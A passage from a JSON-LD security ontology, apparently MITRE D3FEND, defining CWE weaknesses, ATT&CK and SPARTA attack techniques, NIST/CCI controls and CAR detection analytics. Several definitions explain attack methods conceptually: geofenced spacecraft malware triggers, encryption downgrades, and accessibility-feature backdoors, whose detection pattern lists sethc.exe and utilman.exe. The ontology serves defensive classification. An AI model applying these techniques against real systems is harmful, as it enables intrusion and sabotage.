      "rdfs:label": "DMA Device Enabled Too Early in Boot Phase",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-696"
      }
    },
    {
      "@id": "d3f:LogonUser",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:authenticates": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Logon User",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N11a27e9e3fe1488aa1080ab2d55a8978"
        }
      ]
    },
    {
      "@id": "_:N11a27e9e3fe1488aa1080ab2d55a8978",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CWE-909",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-909",
      "d3f:definition": "The product does not initialize a critical resource.",
      "rdfs:label": "Missing Initialization of Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-665"
      }
    },
    {
      "@id": "d3f:CWE-1124",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1124",
      "d3f:definition": "The code contains a callable or other code grouping in which the nesting / branching is too deep.",
      "rdfs:label": "Excessively Deep Nesting",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:EX-0012.10",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.10",
      "d3f:definition": "C&DH relies on tables and runtime values that define how commands are parsed, queued, and dispatched and how telemetry is collected, stored, and forwarded. Targets include opcode-to-handler maps, argument limits and schemas, queue depths and priorities, message ID routing, publish/subscribe bindings, timeline/schedule entries, file catalog indices, compression and packetization settings, and event/telemetry filters. Edits to these artifacts reshape control and visibility: commands are delayed, dropped, or misrouted; telemetry is suppressed or redirected; timelines slip; and housekeeping/data products are repackaged in ways that confuse ground processing. Because many frameworks treat these values as authoritative configuration, small changes can silently propagate across subsystems, degrading responsiveness, creating backlogs, or severing the logical pathways that keep the vehicle coordinated, without modifying the underlying code.",
      "rdfs:label": "Command & Data Handling Subsystem - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/10/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Command & Data Handling Subsystem"
    },
    {
      "@id": "d3f:EX-0006",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0006",
      "d3f:definition": "The adversary alters how confidentiality or integrity is applied so traffic or data is processed in clear or with weakened protection. Paths include toggling configuration flags that place links or storage into maintenance/test modes; forcing algorithm “fallbacks” or null ciphers; downgrading negotiated suites or keys; manipulating anti-replay/counter state so checks are skipped; substituting crypto libraries or tables during boot/update; and selecting alternate routes that carry the same content without encryption. On some designs, distinct modes handle authentication and confidentiality separately, allowing an actor who obtains authentication material to request unencrypted service or to switch to legacy profiles. The end state is that command, telemetry, or data products traverse a path the spacecraft accepts while cryptographic protection is absent, weakened, or inconsistently applied, enabling subsequent tactics such as inspection, manipulation, or exfiltration.",
      "rdfs:label": "Disable/Bypass Encryption - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0006/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Disable/Bypass Encryption"
    },
    {
      "@id": "d3f:CWE-675",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-675",
      "d3f:definition": "The product performs the same operation on a resource two or more times, when the operation should only be applied once.",
      "rdfs:label": "Multiple Operations on Resource in Single-Operation Context",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:T1423",
      "@type": "owl:Class",
      "d3f:attack-id": "T1423",
      "d3f:definition": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans from the mobile device. This technique may take advantage of the mobile device's access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).",
      "rdfs:label": "Network Service Scanning - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDiscoveryTechnique"
      },
      "skos:prefLabel": "Network Service Scanning"
    },
    {
      "@id": "d3f:kb-article",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "The technique x has the kb-article y, where y is written in Markdown.",
      "rdfs:domain": {
        "@id": "d3f:Technique"
      },
      "rdfs:label": "kb-article",
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-reference-annotation"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-002%3ALocalNetworkSniffing_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-002/"
      },
      "d3f:kb-abstract": "Adversaries may use a variety of tools to gain visibility on the current status of things on the network: which processes are listening on which ports, which services are running on other hosts, etc. This analytic looks for the names of the most common network sniffing tools. While this may be noisy on networks where sysadmins are using any of these tools on a regular basis, in most networks their use is noteworthy.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-002: Local Network Sniffing",
      "rdfs:label": "Reference - CAR-2020-11-002: Local Network Sniffing - MITRE"
    },
    {
      "@id": "d3f:EventLogStartEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the event logging service is started, enabling the collection and recording of system events.",
      "rdfs:label": "Event Log Start Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EventLogEvent"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-3_13",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Enforcement | Attribute-based Access Control",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-3(13)"
    },
    {
      "@id": "d3f:CWE-1393",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-1393",
      "d3f:definition": "The product uses default passwords for potentially critical functionality.",
      "d3f:weakness-of": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Use of Default Password",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1392"
        },
        {
          "@id": "_:Ned2316f2b01f420c8521918701d29819"
        }
      ]
    },
    {
      "@id": "_:Ned2316f2b01f420c8521918701d29819",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:T1030",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1030",
      "d3f:definition": "An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.",
      "d3f:produces": {
        "@id": "d3f:InternetNetworkTraffic"
      },
      "rdfs:label": "Data Transfer Size Limits",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExfiltrationTechnique"
        },
        {
          "@id": "_:N1fd959d0bbc949bba3dd46b49783889f"
        }
      ]
    },
    {
      "@id": "_:N1fd959d0bbc949bba3dd46b49783889f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:JavaScriptBlob",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A JavaScript Blob is a Blob that was created by a JavaScript Blob() constructor call or equivalent function.",
      "rdfs:label": "JavaScript Blob",
      "rdfs:subClassOf": {
        "@id": "d3f:BinaryLargeObject"
      }
    },
    {
      "@id": "d3f:Reference-DebuggersForAccessibilityApplications_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-11-006/"
      },
      "d3f:kb-abstract": "The Windows Registry location HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options allows for parameters to be set for applications during execution. One feature used by malicious actors is the \"Debugger\" option. When a key has this value enabled, a Debugging command line can be specified. Windows will launch the Debugging command line, and pass the original command line in as an argument. Adversaries can set a Debugger for Accessibility Applications. The analytic looks for the original command line as an argument to the Debugger. When the strings \"sethc.exe\", \"utilman.exe\", \"osk.exe\", \"narrator.exe\", and \"Magnify.exe\" are detected in the arguments, but not as the main executable, it is very likely that a Debugger is set.\n\nThis analytic could depend on the possibility of the known strings used as arguments for other applications used in the day-to-day environment. Although the chance of the string \"sethc.exe\" being used as an argument for another application is unlikely, it still is a possibility.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-11-003: Debuggers for Accessibility Applications",
      "rdfs:label": "Reference - CAR-2014-11-003: Debuggers for Accessibility Applications - MITRE"
    },
    {
      "@id": "d3f:CWE-1420",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1420",
      "d3f:definition": "A processor event or prediction may allow incorrect operations (or correct operations with incorrect data) to execute transiently, potentially exposing data over a covert channel.",
      "rdfs:label": "Exposure of Sensitive Information during Transient Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-669"
      }
    },
    {
      "@id": "d3f:T1087.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1087.002",
      "d3f:definition": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.",
      "d3f:enumerates": {
        "@id": "d3f:DomainUserAccount"
      },
      "rdfs:label": "Domain Account",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1087"
        },
        {
          "@id": "_:N28d068c98ccf4ef1991f57254c9b34fc"
        }
      ]
    },
    {
      "@id": "_:N28d068c98ccf4ef1991f57254c9b34fc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enumerates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainUserAccount"
      }
    },
    {
      "@id": "d3f:CWE-1421",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1421",
      "d3f:definition": "A processor event may allow transient operations to access architecturally restricted data (for example, in another address space) in a shared microarchitectural structure (for example, a CPU cache), potentially exposing the data over a covert channel.",
      "rdfs:label": "Exposure of Sensitive Information in Shared Microarchitectural Structures during Transient Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1420"
      }
    },
    {
      "@id": "d3f:AML.T0016.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0016.001",
      "d3f:definition": "Adversaries may search for and obtain software tools to support their operations.\nSoftware designed for legitimate use may be repurposed by an adversary for malicious intent.\nAn adversary may modify or customize software tools to achieve their purpose.\nSoftware tools used to support attacks on AI systems are not necessarily AI-based themselves.",
      "rdfs:label": "Software Tools - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0016.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0016"
      },
      "skos:prefLabel": "Software Tools"
    },
    {
      "@id": "d3f:PreAuthenticationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing preparatory steps or processes conducted prior to the primary authentication operation. Pre-authentication often involves initial protocol exchanges, cryptographic challenges, or the validation of supplemental factors (e.g., pre-shared keys) to ensure the readiness and security of the authentication workflow.",
      "rdfs:label": "Pre-Authentication Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AuthenticationEvent"
        },
        {
          "@id": "_:N915b3e8d80b94fad8da00da182461829"
        }
      ]
    },
    {
      "@id": "_:N915b3e8d80b94fad8da00da182461829",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:HierarchicalClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HC",
      "d3f:definition": "Hierarchical clustering (also called hierarchical cluster analysis or HCA) is a method of cluster analysis that seeks to build a hierarchy of clusters.",
      "d3f:kb-article": "## References\nWikipedia. (2021, August 10). Hierarchical clustering. [Link](https://en.wikipedia.org/wiki/Hierarchical_clustering)\nhtml)",
      "rdfs:label": "Hierarchical Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ClusterAnalysis"
      }
    },
    {
      "@id": "d3f:T1005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "d3f:LocalResource"
        }
      ],
      "d3f:attack-id": "T1005",
      "d3f:definition": "Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.",
      "rdfs:label": "Data from Local System",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:Nec41a456616d48858898ba4c3bf30324"
        },
        {
          "@id": "_:Ncc313b771c6f48329395f00984da59a6"
        }
      ]
    },
    {
      "@id": "_:Nec41a456616d48858898ba4c3bf30324",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:Ncc313b771c6f48329395f00984da59a6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalResource"
      }
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACE_TRACEME",
      "@type": "owl:Class",
      "d3f:definition": "Indicates that the process is to be traced by its parent.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_TRACEME",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPITraceProcess"
      }
    },
    {
      "@id": "d3f:Reference-UserActivityFromStoppingWindowsDefensiveServices_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2016-04-003/"
      },
      "d3f:kb-abstract": "Spyware and malware remain a serious problem and Microsoft developed security services, Windows Defender and Windows Firewall, to combat this threat. In the event Windows Defender or Windows Firewall is turned off, administrators should correct the issue immediately to prevent the possibility of infection or further infection and investigate to determine if caused by crash or user manipulation.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemDaemonMonitoring"
      },
      "d3f:kb-reference-title": "CAR-2016-04-003: User Activity from Stopping Windows Defensive Services",
      "rdfs:label": "Reference - CAR-2016-04-003: User Activity from Stopping Windows Defensive Services - MITRE"
    },
    {
      "@id": "d3f:EX-0002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:RuntimeVariable"
      },
      "d3f:attack-id": "EX-0002",
      "d3f:definition": "Malware or implanted procedures execute only when the spacecraft’s state meets geometric and temporal criteria. Triggers can be defined in orbital elements, inertial or Earth-fixed coordinates, relative geometry, lighting conditions, or time references. The code monitors on-board navigation solutions, ephemerides, or propagated TLEs and arms itself when thresholds are met (e.g., “only fire over region X,” “only activate during LEOP,” or “only run within N seconds of a scheduled downlink.”) Geofencing reduces exposure and aids deniability: triggers are rare, aligned with mission cadence, and hard to reproduce on the ground. More elaborate variants require conjunctions of conditions (position + attitude + clock epoch) or incorporate drift so the trigger slowly evolves with the orbit. The result is effect-on-demand: execution occurs precisely where and when the actor intends, while remaining dormant elsewhere.",
      "rdfs:label": "Position, Navigation, and Timing (PNT) Geofencing - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0002/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAExecutionTechnique"
        },
        {
          "@id": "_:Nec7555b092d94e2cbf6eddc72944f9ff"
        }
      ],
      "skos:prefLabel": "Position, Navigation, and Timing (PNT) Geofencing"
    },
    {
      "@id": "_:Nec7555b092d94e2cbf6eddc72944f9ff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RuntimeVariable"
      }
    },
    {
      "@id": "d3f:T1574.013",
      "@type": "owl:Class",
      "d3f:attack-id": "T1574.013",
      "d3f:definition": "Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)",
      "rdfs:label": "KernelCallbackTable",
      "rdfs:subClassOf": {
        "@id": "d3f:T1574"
      }
    },
    {
      "@id": "d3f:CCI-002748_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system restricts the use of the manual override capability to only organization-defined authorized individuals.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DatabaseQueryStringAnalysis"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002748"
    },
    {
      "@id": "d3f:IntranetWebNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Intranet web network traffic is network traffic that does not cross a given network's boundaries and uses a standard web protocol.",
      "d3f:may-contain": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Intranet Web Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Intranet"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IntranetNetworkTraffic"
        },
        {
          "@id": "d3f:WebNetworkTraffic"
        },
        {
          "@id": "_:N4cf5cb7690964964be551c2104c72d89"
        }
      ]
    },
    {
      "@id": "_:N4cf5cb7690964964be551c2104c72d89",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CCI-002476_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to prevent unauthorized disclosure of organization-defined information at rest on organization-defined information system components.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002476"
    },
    {
      "@id": "d3f:CCI-001019_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs cryptographic mechanisms to protect information in storage.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001019"
    },
    {
      "@id": "d3f:T1546.008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.008",
      "d3f:definition": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.",
      "d3f:may-create": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "d3f:may-modify": [
        {
          "@id": "d3f:ExecutableBinary"
        },
        {
          "@id": "d3f:SystemConfigurationDatabaseRecord"
        }
      ],
      "rdfs:label": "Accessibility Features",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N75827d8793364ca6b3b4bae37384df06"
        },
        {
          "@id": "_:N78ead1386ee346d7b36dbe41a475509a"
        },
        {
          "@id": "_:Nfd713f730ae54325ad6146e88b6989cc"
        }
      ]
    },
    {
      "@id": "_:N75827d8793364ca6b3b4bae37384df06",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "_:N78ead1386ee346d7b36dbe41a475509a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "_:Nfd713f730ae54325ad6146e88b6989cc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:T0867",
      "@type": "owl:Class",
      "d3f:attack-id": "T0867",
      "d3f:definition": "Adversaries may transfer tools or other files from one system to another to stage adversary tools or other files over the course of an operation. (Citation: Enterprise ATT&CK) Copying of files may also be performed laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares. (Citation: Enterprise ATT&CK)",
      "rdfs:label": "Lateral Tool Transfer - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSLateralMovementTechnique"
      },
      "skos:prefLabel": "Lateral Tool Transfer"
    },
    {
      "@id": "d3f:CWE-419",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-419",
      "d3f:definition": "The product uses a primary channel for administration or restricted functionality, but it does not properly protect the channel.",
      "rdfs:label": "Unprotected Primary Channel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-923"
      }
    },
    {
      "@id": "d3f:GNSSSignal",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A GNSS (Global Navigation Satellite System) signal is a low-power radio signal broadcast from satellites that contains a carrier wave, a ranging code, and a navigation message. The receiver uses the carrier wave to precisely measure the time it takes for the signal to travel from the satellite, while the navigation message provides essential information like the satellite's position (ephemeris) and clock information.",
      "d3f:synonym": "Global Navigation Satellite System Signal",
      "rdfs:label": "GNSS Signal",
      "rdfs:seeAlso": [
        {
          "@id": "https://dbpedia.org/resource/Satellite_navigation"
        },
        {
          "@id": "https://gssc.esa.int/navipedia/index.php/GNSS_signal"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ElectromagneticSignal"
        },
        {
          "@id": "_:Ne9f5c46399fa40eeb9f5101af96778db"
        }
      ]
    },
    {
      "@id": "_:Ne9f5c46399fa40eeb9f5101af96778db",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:carries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GNSSTimeRecord"
      }
    },
    {
      "@id": "d3f:CWE-1189",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1189",
      "d3f:definition": "The System-On-a-Chip (SoC) does not properly isolate shared resources between trusted and untrusted agents.",
      "rdfs:label": "Improper Isolation of Shared Resources on System-on-a-Chip (SoC)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-653"
        },
        {
          "@id": "d3f:CWE-668"
        }
      ]
    },
    {
      "@id": "d3f:IntegerRangeValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-IRV",
      "d3f:definition": "Ensuring that an integer is within a valid range.",
      "d3f:hardens": {
        "@id": "d3f:MathematicalFunction"
      },
      "d3f:kb-article": "## How it Works\nInteger Range Validation can be done by programmatically checking the value of an integer before or after an operation to determine if the resulting value will be valid.\nChecking the value of an integer to ensure it is in a valid range helps prevent integer overflow, wraparound, and logical errors.\n\n## Considerations\n* A valid range can be defined by language, data-type, or logical constraints.\n* Take extra care when doing operations on integers that will result in a value close to the bounds of a valid range.\n* Note: This resource should not be considered a definitive or exhaustive coding guideline.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-IntegerRangeValidation_SEI"
      },
      "rdfs:label": "Integer Range Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SourceCodeHardening"
        },
        {
          "@id": "_:N6254134324a74adaa194814978d47d46"
        }
      ]
    },
    {
      "@id": "_:N6254134324a74adaa194814978d47d46",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MathematicalFunction"
      }
    },
    {
      "@id": "d3f:DE-0003.10",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0003.10",
      "d3f:definition": "A satellite with a GPS receiver can use ephemeris data from GPS satellites to estimate its own position in space. A hostile actor could spoof the GPS signals to cause erroneous calculations of the satellite’s position. The received ephemeris data is often telemetered and can be monitored for indications of GPS spoofing. Reception of ephemeris data that changes suddenly without a reasonable explanation (such as a known GPS satellite handoff), could provide an indication of GPS spoofing and warrant further analysis. Threat actors could also change the course of the vehicle and falsify the telemetered data to temporarily convince ground operators the vehicle is still on a proper course.",
      "rdfs:label": "GPS Ephemeris - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/10/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0003"
      },
      "skos:prefLabel": "GPS Ephemeris"
    },
    {
      "@id": "d3f:CCI-001400_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system supports and maintains the binding of organization-defined security attributes to information in process.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001400"
    },
    {
      "@id": "d3f:EX-0009",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0009",
      "d3f:definition": "The adversary executes actions on-board by abusing defects in software that runs on the vehicle, ranging from application logic in flight software to libraries, drivers, and supporting services. Outcomes range from arbitrary code execution and privilege escalation to silent logic manipulation (e.g., bypassing interlocks, suppressing alarms) that appears operationally plausible. The hallmark of this technique is that the attacker co-opts existing code paths, often rarely used ones, to run unintended behavior under nominal interfaces. These attacks may be extremely targeted and tailored to specific coding errors introduced as a result of poor coding practices or they may target known issues in the commercial software components.",
      "rdfs:label": "Exploit Code Flaws - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0009/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Exploit Code Flaws"
    },
    {
      "@id": "d3f:T1627",
      "@type": "owl:Class",
      "d3f:attack-id": "T1627",
      "d3f:definition": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign. Values an adversary can provide about a target system or environment to use as guardrails may include environment information such as location.(Citation: SWB Exodus March 2019)",
      "rdfs:label": "Execution Guardrails - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Execution Guardrails"
    },
    {
      "@id": "d3f:ExecutionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to run malicious code.",
      "d3f:enables": {
        "@id": "d3f:TA0002"
      },
      "rdfs:label": "Execution Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N5fd11afbdc174683b786e06d5ce65bb2"
        }
      ]
    },
    {
      "@id": "_:N5fd11afbdc174683b786e06d5ce65bb2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0002"
      }
    },
    {
      "@id": "d3f:CWE-681",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-681",
      "d3f:definition": "When converting from one data type to another, such as long to integer, data can be omitted or translated in a way that produces unexpected values. If the resulting values are used in a sensitive context, then dangerous behaviors may occur.",
      "rdfs:label": "Incorrect Conversion between Numeric Types",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-704"
      }
    },
    {
      "@id": "d3f:WebSocketURL",
      "@type": [
        "owl:NamedIndividual",
